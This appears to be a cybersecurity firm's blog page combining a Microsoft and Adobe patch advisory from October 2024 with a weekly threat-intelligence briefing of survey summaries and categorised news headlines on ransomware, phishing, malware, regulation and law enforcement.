CISA says critical Fortinet RCE flaw now exploited in attacks (bleepingcomputer.com)

Palo Alto fixed critical flaws in PAN-OS firewalls that allow for full compromise of the devices (securityaffairs.com)

Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)

Apple Releases Critical iOS and iPadOS Updates to Fix VoiceOver Password Vulnerability (thehackernews.com)

Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews

New DDoS Attack Vector Discovered In CUPS, Exposing 58,000+ Vulnerable Devices Online (informationsecuritybuzz.com)

UK telcos including BT at risk from DrayTek router vulnerabilities | Computer Weekly

Critical Apache Avro SDK RCE flaw impacts Java applications (securityaffairs.com)

PoC Exploit Released for Microsoft Office 0-day Flaw - CVE-2024-38200 (cybersecuritynews.com)

Single HTTP Request Can Exploit 6M WordPress Sites (darkreading.com)

Okta Classic customers told to check logs for sign-on bypass | SC Media (scworld.com)

Adobe Releases Security Updates for Multiple Products | CISA

Three new Ivanti CSA zero-day actively exploited in attacks (securityaffairs.com)

US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)

VMware NSX Vulnerabilities Allow Hackers To Execute Arbitrary Commands (cybersecuritynews.com)

Researchers discover 14 new DrayTek vulnerabilities | Security Magazine

Qualcomm confirms cyber attack on Android devices that exploited a vulnerability in its chipsets (androidauthority.com)

WordPress LiteSpeed Cache plugin flaw could allow site takeover (securityaffairs.com)

These vulnerabilities in Apache HTTP Server enable HTTP Request Smuggling and SSL Authentication Bypass, posing severe threats to organisations worldwide | TechRadar

Still running Windows 11 22H2? No more security fixes from Microsoft for you! (betanews.com)

Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409) - Help Net Security

Firefox Zero-Day Under Attack: Update Your Browser Immediately (thehackernews.com)

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Advisory 09 October 2024 – Microsoft and Adobe Security Updates

Black Arrow Cyber Advisory 09 October 2024 – Microsoft Patch Tuesday and Adobe Security Updates

Executive summary

Microsoft’s October Patch Tuesday provides updates to address 117 security issues across its product range, including two actively exploited vulnerabilities and three publicly disclosed bugs. In addition to the Microsoft updates, this week also saw Adobe fix 52 vulnerabilities across various products.

What’s the risk to me or my business?

The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisation’s data on the affected systems.

What can I do?

Black Arrow recommends applying the available security updates for all supported versions of Windows and all affected Adobe products as soon as possible, prioritising the actively exploited vulnerabilities and all other vulnerabilities that have a critical severity rating.

Microsoft

Further details on other specific updates within this Microsoft Patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct

Adobe

Further details of the vulnerabilities in Adobe products can be found here under ‘Recent bulletins and advisories’:

https://helpx.adobe.com/security/security-bulletin.html

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin

Black Arrow Cyber Threat Briefing 04 October 2024

Black Arrow Cyber Threat Intelligence Briefing 04 October 2024:

-How Snoozing on Cyber Security Fails Modern Businesses

-Cyber Criminals Capitalise on Poorly Configured Cloud Environments

-90% of Cyber Security Incidents Could Be Avoided, Survey Reveals

-The Cyber Industry Needs to Accept It Can't Eliminate Risk

-Cyber Teams Say They Can’t Keep Up with Attack Volumes

-C-Level Executives are a Weak Point for Cyber Security

-Email Phishing Attacks Surge as Attackers Bypass Security Controls

-Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot

-Ten Million Brits Hit by Fraud in Just Three Years

-Is the Weakest Link in Cyber Security Becoming Even Weaker?

-Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds

Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

How Snoozing on Cyber Security Fails Modern Businesses

A recent study has found that many organisations are delaying crucial data security updates, likened to hitting the snooze button on an alarm. This reluctance to modernise security measures leaves businesses vulnerable to evolving threats as technologies like cloud and AI are integrated into operations. The report highlights that clinging to legacy security systems can lead to significant financial and reputational damage. Despite the ever-present threat of cyber attacks, many organisations hesitate to upgrade due to comfort with existing systems and perceived cost implications. The adoption of modern security practices like Zero Trust models and AI-driven tools is essential to mitigate these risks.

Cyber Criminals Capitalise on Poorly Configured Cloud Environments

According to the 2024 Elastic Global Threat Report, cyber criminals are exploiting poorly configured cloud environments and leveraging off-the-shelf offensive security tools, which account for approximately 54% of observed malware alerts, with one tool responsible for over 27% of infections. Misconfigurations are widespread: 47% of Microsoft Azure failures are tied to storage issues, and 30% of AWS failures result from the lack of multi-factor authentication. There has been a 12% increase in brute-force techniques, particularly in Azure environments. While defence technologies are making progress, the report emphasises the need for enterprises to enhance cloud configurations and enforce security measures like multi-factor authentication.

90% of Cyber Security Incidents Could Be Avoided, Survey Reveals

Veeam Software has found that only 43% of EMEA IT decision-makers believe the forthcoming NIS2 directive will significantly enhance EU cyber security. This scepticism persists despite 90% of respondents reporting at least one security incident in the past year that NIS2 could have prevented. While nearly 80% are confident they will eventually comply with NIS2, up to two-thirds expect to miss the October 2024 deadline. The report highlights barriers to compliance, including technical debt (24%), lack of leadership understanding (23%), and insufficient budget (21%). Additionally, 40% have experienced decreased IT budgets since NIS2 was announced, with many organisations ranking it lower in urgency than other business priorities.

The Cyber Industry Needs to Accept It Can't Eliminate Risk

A recent analysis highlights that striving for zero risk in cyber security is unattainable for organisations. The reliance on large technology providers like CrowdStrike exposes systemic risks, where an incident can have widespread impact across dependent businesses. The article emphasises that instead of pursuing perfection, organisations should focus on reducing risks to a manageable level. Transparency with stakeholders about residual risks is crucial to set realistic expectations and maintain trust. It also suggests diversifying technology stacks to avoid overloading risk onto a few providers, and implementing practical security measures that can be consistently followed to manage risks effectively.

Cyber Teams Say They Can’t Keep Up with Attack Volumes

ISACA has found that understaffing and underfunding are major concerns for cyber security professionals in Europe, with 61% reporting understaffed teams and 52% citing underfunding despite predicted spending increases. The report highlighted that 68% feel their work is more stressful now than in 2019 due to a complex threat landscape. Nearly 58% expect to face a cyber attack in the next 12 months, up six percentage points from 2023. Additionally, 52% pointed to a lack of soft skills among cyber security professionals, especially communication, which is exacerbating the skills gap in the industry.

C-Level Executives are a Weak Point for Cyber Security

Research indicates that 72% of US senior executives have been targeted by cyber attacks in the past 18 months, highlighting the C-suite as a key security vulnerability. Attacks have grown in frequency and sophistication, with impersonation scams up by 26%, and 27% involving AI-assisted deepfakes. Despite this, many organisations have not prioritised executive security training, though 87% of IT professionals believe senior executives require more training than other staff. As cyber security remains a top concern, companies must enhance security measures to protect their data.

Email Phishing Attacks Surge as Attackers Bypass Security Controls

Egress has reported a 28% rise in email phishing attacks in Q2 2024 compared to Q1, highlighting how effectively attackers are bypassing security controls. These threats are harder to stop because 44% of attacks originated from internally compromised accounts and 8% from compromised supply chain accounts, both of which pass the checks that catch external senders. The report found that 89% of phishing emails involved impersonation, often targeting HR, IT and finance departments. Additionally, commodity attacks have surged, causing a 2700% increase in phishing volumes during such campaigns. Emerging trends also show attackers using multi-channel approaches, moving beyond email to platforms like MS Teams and WhatsApp to reach their targets.

Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot

PwC has found that cloud-related threats are now the top concern for executives, with 42% ranking them as their primary worry. Despite this focus, 34% admit they are least prepared to address these issues. Hack-and-leak operations and third-party breaches are also significant concerns, cited by 38% and 35% of respondents respectively. Interestingly, Chief Information Security Officers place ransomware among their top three worries, with 42% feeling underprepared to tackle it. The expanding attack surface from increased reliance on cloud, AI, and connected devices underscores the need for an agile, enterprise-wide approach to resilience.

Ten Million Brits Hit by Fraud in Just Three Years

A recent study sponsored by Santander UK and conducted by the Social Market Foundation (SMF) revealed that 21% of respondents across 15 European countries experienced fraud between 2021 and 2023, at a direct cost of £168bn. However, the SMF estimated the total cost of such incidents at £420bn; this includes productivity losses from having to spend time reporting and recovering from the fraud incident. In the UK alone, victims lost an average of £907 each, amounting to a total direct cost of around £9bn. The report highlights that while most believe banks should lead in compensating victims, many also see digital platforms and telecom providers as responsible. Both SMF and Santander are calling on the British government to spearhead a global initiative to combat fraud, including international agreements and enhanced law enforcement.

Is the Weakest Link in Cyber Security Becoming Even Weaker?

Human error is the leading cause of cyber security breaches, with Cybint reporting that 95% result from human mistakes. Verizon's 2023 Data Breach Investigations Report highlights that 74% of incidents involve a human element, such as clicking on phishing links. The rise of deepfakes and increased exposure of personal information have intensified these risks, making attacks more sophisticated. Despite awareness training, prominent organisations continue to face breaches. Notably, Gen Z is over three times more likely to fall for online fraud compared to baby boomers. Remote working has further blurred boundaries, increasing vulnerability to cyber attacks.

Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds

FGS Global has found that cyber attacks are the top concern for UK businesses, with 36% of senior leaders reporting cyber incidents in the past year. Despite 85% of firms experiencing a crisis, only 36% feel highly prepared to handle ransomware attacks, which over half fear facing. The report highlights a lack of understanding around cyber security and cyber crime, intensified by AI risks.

Sources:

https://votiro.com/blog/how-snoozing-on-cybersecurity-fails-modern-businesses/

https://www.helpnetsecurity.com/2024/10/04/cloud-environments-attack-surface/

https://dcnnmagazine.com/security/90-of-cybersecurity-incidents-could-be-avoided-survey-reveals/

https://www.computerweekly.com/opinion/The-cyber-industry-needs-to-accept-it-cant-eliminate-risk

https://www.computerweekly.com/news/366612212/Cyber-teams-say-they-cant-keep-up-with-attack-volumes

https://www.techradar.com/pro/c-level-executives-are-a-weak-point-for-cybersecurity-research-says

https://www.infosecurity-magazine.com/news/email-phishing-surge-bypass/

https://www.techradar.com/pro/security/security-threats-are-more-pressing-than-ever-for-business-leaders-with-cloud-worries-taking-top-spot

https://www.infosecurity-magazine.com/news/ten-million-brits-hit-fraud-three/

https://hackernoon.com/is-the-weakest-link-in-cybersecurity-becoming-even-weaker

https://www.cityam.com/cyber-incidents-are-the-achilles-heel-for-major-uk-ceos-report-finds/


Governance, Risk and Compliance

CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)

Allies to Leverage During a Cyber Crisis (darkreading.com)

The cyber industry needs to accept it can't eliminate risk | Computer Weekly

PwC Urges Boards to Give CISOs a Seat at the Table - Infosecurity Magazine (infosecurity-magazine.com)

Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)

Almost half of professional services firms are not equipped to survive a major cyber security attack | Today's Conveyancer (todaysconveyancer.co.uk)

As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop

Human Capital and Risk Governance: Insider Threats To Cyber Security (forbes.com)

Cyber security teams are understaffed, overworked, and underfunded – and it’s taking a heavy toll on mental health | ITPro

Global cyber threat to double predicts new report (emergingrisks.co.uk)

QBE casts light on what’s ahead in cyber space | Insurance Business America (insurancebusinessmag.com)

Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru

C-level executives are a weak point for cyber security | TechRadar

Average North American CISO salary now $565,000 • The Register

BlackBerry report: Cyber threats up 53%, critical sectors hit (securitybrief.co.nz)

Cyber teams say they can’t keep up with attack volumes | Computer Weekly

Watch out, CFOs: cyber crime is booming, says former White House advisor | Fortune

Normalizing Security Culture: Stay Ready (darkreading.com)

Cyber attacks causing reputational damages: CIRA – BNN Bloomberg

Security spending signals major role change for CISOs and their teams | CSO Online

Cyber Security Spending on the Rise, But Security Leaders Still Feel Vulnerable - Infosecurity Magazine (infosecurity-magazine.com)

Strengthening Security Posture Through People-First Engagement (informationsecuritybuzz.com)

Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard

Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)

How to Enlist the CFO as a Cyber Security Budget Ally | Mimecast


Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attackers hop from on-premises systems to cloud to compromise Microsoft 365 accounts - Help Net Security

Ransomware gangs are using stolen data to threaten CEOs | Fortune

Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)

Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek

Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop

Russia’s FSB protected Evil Corp gang that carried out NATO cyber-attacks (yahoo.com)

US charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)

More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop

Ransomware activity shows no signs of slowing down - Help Net Security

International Counter Ransomware Initiative 2024 Joint Statement | The White House

Ransomware crew infects 100+ orgs monthly with BabyLockerKZ • The Register

Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)

As ransomware attacks surge, UK privacy regulator investigating fewer incidents than ever (therecord.media)

Healthcare organisations are having to pay millions to solve ransomware attacks | TechRadar

Here's what to expect from the Counter Ransomware Initiative meeting this week (therecord.media)

JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)

Some of the world's biggest countries are teaming up to tackle ransomware scams | TechRadar

Ransomware August 2024 round-up: fools, rules and tools | TechFinitive

Ransomware Victims

Cleaning Up A Cyber Security Mess: Blue Mantis Details The ‘Aftermath’ Of A Ransomware Attack (crn.com)

Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek

Ransomware forces Texas hospital to turn away ambulances • The Register

Agence France-Presse says cyber attack targeted IT systems (therecord.media)

Dermatology Practice Sued After Ransomware Attack Exposed Data (bloomberglaw.com)

Phishing & Email Based Attacks

UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly

New report reveals a rise in phishing attacks, as commodity (globenewswire.com)

Email Phishing Attacks Surge as Attackers Bypass Security Controls - Infosecurity Magazine (infosecurity-magazine.com)

Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)

UK issues alert over threat from cyber attackers working for Iranian state | Evening Standard

iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)

Common Words in Email Scams: Money, Income, Investment, More | Entrepreneur

QR Code phishing is advancing to a new level, so be on your guard | TechRadar

The Hidden Risks of URL Rewriting and the Superior Alternative for Email Security - Security Boulevard

Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)

“Gone Phishing”—Every Cyber Attacker’s Favorite Phrase - Gigaom

IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials (thehackernews.com)

INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)

Google spooks out users with an erroneous 'You added a new card to your Google Account' email (androidauthority.com)

New Email Scam Includes Pictures of Your House. Don’t Fall For It. | Electronic Frontier Foundation (eff.org)

Ireland is the most phished country in the world, says survey (siliconrepublic.com)

Business Email Compromise (BEC)/Email Account Compromise (EAC)

IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert

Other Social Engineering

QR Code phishing is advancing to a new level, so be on your guard | TechRadar

UK Hacker Charged in $3.75 Million Insider Trading Scheme Using Hacked Executive Emails (thehackernews.com)

Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors

INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)

Physical Security Is a Big Part of Staying Digitally Safe: My 5 Top Tips (makeuseof.com)

New Email Scam Includes Pictures of Your House. Don’t Fall For It. | Electronic Frontier Foundation (eff.org)

Meet the people hacker trying to improve cyber security (siliconrepublic.com)

Artificial Intelligence

AI-related cyber crime sparks concern among 65% of global survey participants (techmonitor.ai)

New report reveals a rise in phishing attacks, as commodity (globenewswire.com)

Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon

Three essential steps for organisations to safeguard against deepfakes | TechRadar

Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)

Putting an end to the AI cyber responsibility turf wars | CyberScoop

Shadow AI, Data Exposure Plague Workplace Chatbot Use (darkreading.com)

FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)

Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)

Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)

Could APIs be the undoing of AI? - Help Net Security

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)

1 in 4 people have experienced identity fraud - and most of them blame AI | ZDNET

Rogue AI: What the Security Community is Missing | Trend Micro (US)

Spotting AI-generated scams: Red flags to watch for - Help Net Security

Large language models hallucinating non-existent developer packages could fuel supply chain attacks | InfoWorld

Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)

Nokia's Threat Intelligence Report: Telecom Cyber Attacks Surge with AI & Automation (thefastmode.com)

2FA/MFA

The most common authentication method is also the least secure - Help Net Security

Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)

Malware

Hackers are using a ChromeLoader exploit to set up fake companies and malware-ridden websites | ITPro

FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)

New Fin7 Hacker’s AI Naked Image Generator Serves Up More Than Nudes (forbes.com)

DCRat Malware Spreads via HTML Smuggling | MSSP Alert

Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)

New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking (thehackernews.com)

Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)

Microsoft reveals how Windows 10 and Windows 11 block keyloggers - Neowin

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)

Here's How Criminals Use CAPTCHAs to Help Spread Malware (makeuseof.com)

North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)

Bots/Botnets

New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)

What bots mean for businesses and consumers - Help Net Security

Mobile

iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)

This nasty Android adware is making phones unusable — how to stay safe | Tom's Guide (tomsguide.com)

Google Adds New Pixel Security Features to Block 2G Exploits and Baseband Attacks (thehackernews.com)

‘Pig butchering’ trading apps found on Google Play, App Store (bleepingcomputer.com)

Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)

Denial of Service/DoS/DDoS

Record-Breaking DDoS Attack Peaked at 3.8 Tbps, 2.14 Billion Pps - SecurityWeek

DDoS Attacks Skyrocket and Hacktivist Activity Surges Threatening Critical Global Infrastructure According to NETSCOUT’s 1H2024 Threat Intelligence Report | Business Wire

After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek

Hacktivist activity drives a rise in DDoS attacks (betanews.com)

Telcos face increasing frequency and sophistication of DDoS attacks - Nokia (telecoms.com)

Cloudflare mitigated new record-breaking DDoS attack of 3.8 Tbps (securityaffairs.com)

Wave of record-breaking DDoS attacks originating from compromised WiFi routers | Cybernews

Internet of Things – IoT

Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)

Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors

Data Breaches/Leaks

Transport for London (TfL) cyber attack: What you need to know - BBC News

Half of Enterprises Surveyed Have Experienced a Security Breach Due to Unmanaged Non-Human Identities, According to AppViewX Report | Business Wire

43% of data breaches target small businesses in 5 industries | Retail Technology Review

Northern Ireland Police Data Leak Sees Service Fined by ICO - Infosecurity Magazine (infosecurity-magazine.com)

UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch

Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek

T-Mobile US agrees to $31.5M settlement after IT breaches • The Register

The sensitive data of Australia's security personnel is at risk of being on-sold to foreign actors - ABC News

Dutch police breached by a state actor (securityaffairs.com)

Louisiana Accounting Firm Breach Impacts More Than 127K Customers | MSSP Alert

Organised Crime & Criminal Actors

UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune

Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)

How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch

UK reveals father and son at heart of Evil Corp hacking group - BBC News

Cyber Security Losses Surge to $2.1 Billion in 2024: WazirX Seeks Court Protection (financemagnates.com)

Man charged for selling forged license keys for network switches (bleepingcomputer.com)

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Linux malware “perfctl” behind years-long cryptomining campaign (bleepingcomputer.com)

Cyber Security Losses Surge to $2.1 Billion in 2024: WazirX Seeks Court Protection (financemagnates.com)

New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking (thehackernews.com)

Over $750 Million Stolen in Crypto Last Quarter Despite Drop in Hacks: CertiK - Decrypt

New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)

AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)

Insider Risk and Insider Threats

Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon

Insider Threats: Are Disgruntled Employees a Cyber Security Risk? | PLANSPONSOR

Insurance

A Guide to Buying and Maintaining Cyberinsurance | PLANSPONSOR

Beazley forecasts cyber insurance market to grow to $40bn by 2030 - Reinsurance News

Munich Re’s HSB launches comprehensive cyber insurance solution for SMBs - Reinsurance News

Supply Chain and Third Parties

Cyber companies need a best practice approach to major incidents. | Computer Weekly

Digital twins are optimizing supply chains and more. Here's why enterprises should care | ZDNET

Cloud/SaaS

Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)

Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks (thehackernews.com)

Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek

Cloud threats top execs' list of cyber nightmares • The Register

Security threats are more pressing than ever for business leaders, with cloud worries taking top spot | TechRadar

Cyber criminals capitalize on poorly configured cloud environments - Help Net Security

The top enterprise cloud threats of 2024 (betanews.com)

Ransomware attackers hop from on-premises systems to cloud to compromise Microsoft 365 accounts - Help Net Security

Hackers Breach Hybrid Cloud with Stolen Entra ID Credentials (petri.com)

IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert

Hacker made millions from breaking into business Office 365 accounts | TechRadar

Navigating the Security Risks of Multicloud Management (darkreading.com)

Top 6 Cloud Security Threats to Watch Out For - Security Boulevard

The End of The SaaS Era: Rethinking Software’s Role In Business

Outages

Cyber companies need a best practice approach to major incidents. | Computer Weekly

UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)

Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)

The Playstation Network is down in a global outage (bleepingcomputer.com)

Identity and Access Management

Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek

Half of Enterprises Surveyed Have Experienced a Security Breach Due to Unmanaged Non-Human Identities, According to AppViewX Report | Business Wire

Active Directory attack guidance issued by Five Eyes | SC Media (scworld.com)

Encryption

The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register

Linux and Open Source

Highly Anticipated Linux Flaw Allows Remote Code Execution, but Less Serious Than Expected - SecurityWeek

Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET

After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek

New Perfctl Malware Targets Linux Servers for Cryptocurrency Mining and Proxyjacking (thehackernews.com)

Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)

Passwords, Credential Stuffing & Brute Force Attacks

The most common authentication method is also the least secure - Help Net Security

Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)

Irish Data Protection Commission fines Meta €91 million for passwords stored in plaintext | CyberScoop

IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert

Passkeys and Cyber Security Awareness: A New Era Of Business Security (informationsecuritybuzz.com)

Poor password habits still an issue worldwide (betanews.com)

Complicated Passwords Make You Less Safe, Experts Now Say (forbes.com)

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials (thehackernews.com)

Why your password policy should include a custom dictionary (bleepingcomputer.com)

Social Media

Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)

Irish Data Protection Commission fines Meta €91 million for passwords stored in plaintext | CyberScoop

Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors

UK regulator preparing for ‘strong action’ against tech giants

Are social media influencers equipped to dodge cyber attacks? | Mint (livemint.com)

Brits bemoan personal data practices but do little about it • The Register

Training, Education and Awareness

Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon

One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)

Regulations, Fines and Legislation

NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)

90% of cyber security incidents could be avoided, survey reveals - Data Centre & Network News (dcnnmagazine.com)

Majority of Companies will Miss Looming NIS2 Deadline as New European Union Cyber Security Directive Goes into Effect | Business Wire

Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)

SolarWinds CISO: World's Cyber Regulations Still 'In Flux' (pymnts.com)

Irish Data Protection Commission fines Meta €91 million for passwords stored in plaintext | CyberScoop

Northern Ireland Police Data Leak Sees Service Fined by ICO - Infosecurity Magazine (infosecurity-magazine.com)

Sellafield nuclear site in Cumbria fined for IT security breaches - BBC News

As ransomware attacks surge, UK privacy regulator investigating fewer incidents than ever (therecord.media)

Government outlines plan for Cyber Security and Resilience Bill | UKAuthority

The UK Cybersecurity and Resilience Bill – A Different Approach to NIS2 or a British Sister Act? | DLA Piper - JDSupra

Ireland has been slow to incorporate new EU cyber security law, and may now miss deadline | Irish Independent

How Should CISOs Navigate the SEC Cyber Security Rules? (darkreading.com)

Ireland to grant National Cyber Security Centre emergency powers (finextra.com)

Opinion: How to design a US data privacy law | Ars Technica

UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch

T-Mobile US agrees to $31.5M settlement after IT breaches • The Register

Opinion | Artificial Intelligence Requires Specific Safety Rules - The New York Times (nytimes.com)

Minimum Healthcare Cyber Standards Called by New Legislation | MSSP Alert

UK regulator preparing for ‘strong action’ against tech giants

Cyber Security in the European Union | Cooley LLP - JDSupra

Financial regulatory agencies are sunsetting a tool to assess cyber risks | FedScoop

Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)

Models, Frameworks and Standards

NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)

90% of cyber security incidents could be avoided, survey reveals - Data Centre & Network News (dcnnmagazine.com)

Majority of Companies will Miss Looming NIS2 Deadline as New European Union Cyber Security Directive Goes into Effect | Business Wire

Could Security Misconfigurations Top OWASP List? (darkreading.com)

Government outlines plan for Cyber Security and Resilience Bill | UKAuthority

The UK Cybersecurity and Resilience Bill – A Different Approach to NIS2 or a British Sister Act? | DLA Piper - JDSupra

Ireland has been slow to incorporate new EU cyber security law, and may now miss deadline | Irish Independent

Data Protection

Opinion: How to design a US data privacy law | Ars Technica

Brits bemoan personal data practices but do little about it • The Register

Careers, Working in Cyber and Information Security

Cyber security teams are understaffed, overworked, and underfunded – and it’s taking a heavy toll on mental health | ITPro

ISACA: European Security Teams Are Understaffed and Underfunded - Infosecurity Magazine (infosecurity-magazine.com)

Average North American CISO salary now $565,000 • The Register

Cyber UK's quickest growing tech field, but skills gap remains | Computer Weekly

Cyber security Professionals Operate Under Increased Stress Levels - Security Boulevard

How Are We Going to Fill 4.8 Million Cyber Security Jobs? (inforisktoday.com)

Cyber security hiring slows, pros' stress levels rise - Help Net Security

Share of Women in UK Cyber Roles Now Just 17% - Infosecurity Magazine (infosecurity-magazine.com)

In-house skills and co-management, what is the balance to optimize security skills needed for cyber resilience | ITPro

Law Enforcement Action and Take Downs

Russia exploited Evil Corp relationship for NATO attacks • The Register

Unmasked: The Evil Corp cyber gangster who worked for LockBit | Computer Weekly

UK unmasks LockBit ransomware affiliate as high-ranking hacker in Russia state-backed cyber crime gang | TechCrunch

More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek

Iranian hackers charged over Trump campaign disruption | TechRadar

U.S. charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)

U.K. Hacker Charged in $3.75 Million Insider Trading Scheme Using Hacked Executive Emails (thehackernews.com)

Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot

Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)

How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch

UK reveals father and son at heart of Evil Corp hacking group - BBC News

INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)

Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)

More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop

Telegram revealed it shared U.S. user data with law enforcement (securityaffairs.com)

